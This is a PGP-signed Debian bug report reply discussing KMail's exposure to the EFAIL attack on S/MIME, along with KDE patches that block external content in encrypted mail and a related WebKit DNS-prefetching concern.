Bug#898634: kmail: efail attack against S/MIME
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
On Wed, 2018-05-16 at 11:44 +0200, Sandro Knauß wrote:
> Hey,
Hi Sandro, thanks for the update on this.
>
> For S/MIME the situation is that it is a conceptional weakness in the standard
> to remove the target vector completely.
Agreed, and I'm unsure what we can do about it in Debian right now, besides
mitigation for backchannels.
>
> In KMail we have the best handling that we can get at the moment (with default
> settings). KMail never access resources from the internet without asking the
> user or an explicit change of the default setting:
> Settings > Configure KMail > Security > Reading > Allow messages to load
> external references from the Internet
Ok. Other clients like Evolution and Trojita also had an issue with DNS
prefetching which could be re-enabled in Webkit. Not sure on what library
KMail relies for HTML rending but it might be worth checking that too?
See https://bugs.webkit.org/show_bug.cgi?id=182924 for the webkit bug (with
links to the Evolution and Trojita ones).
>
> There are some small patches, that disable this setting for encrypted
> messages, to enforce a user interaction:
>
> https://phabricator.kde.org/D12391
> https://phabricator.kde.org/D12393
> https://phabricator.kde.org/D12394
>
> For me applying the patches makes sense to improve security for users, but
> disabling the external resource loading completely would break workflows.
> Those patches are applied for the following Debian packages, where the
> setting
> is used for everything:
> libmessageviewer5 << 4:18.04.1
> kmail < 4:18.04.1
Thanks, that's good to know.
>
> As already mentioned, the underlying problem is the S/MIME conceptional
> weaknes, that can't be fixed by those patches.
>
> The stack KMail is using for decryption is GPGME Qt backend that is
> packaged
> in gpgme1.0 for testing/sid and gpgmepp for stable and older.
>
> I'm not sure, how this should be handled in Debian correctly.
I'm not sure either, to be honest.
>
> For a more detailed look for KMail and EFail see the dot.kde article:
>
> https://dot.kde.org/2018/05/15/efail-and-kmail
That article indicates KMail uses GnuPG for S/MIME, which I find a bit weird.
- --
Yves-Alexis
-----BEGIN PGP SIGNATURE-----
iQEzBAEBCAAdFiEE8vi34Qgfo83x35gF3rYcyPpXRFsFAlr8AQkACgkQ3rYcyPpX
RFvIOQf/YLo7d/Fgy8CCPYH+rwiS0A+EwzXQZhCCykF4nk9lGH3uwQHGa9a4UdJT
FuCBu3krxPUymczIsT+p0XCUBuindZ8wknMzkqJ9rRXGN0L3634Cau7CgSA4e84H
bG1EMMfWxx2wwAjaK3dAXHF4gAUXRVfpKMdJEpidFiXZ9ixZtCKSyhM2AaF+IYli
I8kVG6gzOxrEwo+2BbQOjo+e25be19HoktnQAFbBEafVIwcjQSrop5Y4A6cXkJ5P
CT0tzc+VloCIgDwQHEkUCyM3rXJbkklgZWmTXhhDU1lMteZixnXU5uB2Gc5akW4q
alumMVM6AXu9NzAe+PioFrChglkixQ==
=2SgF
-----END PGP SIGNATURE-----
Reply to: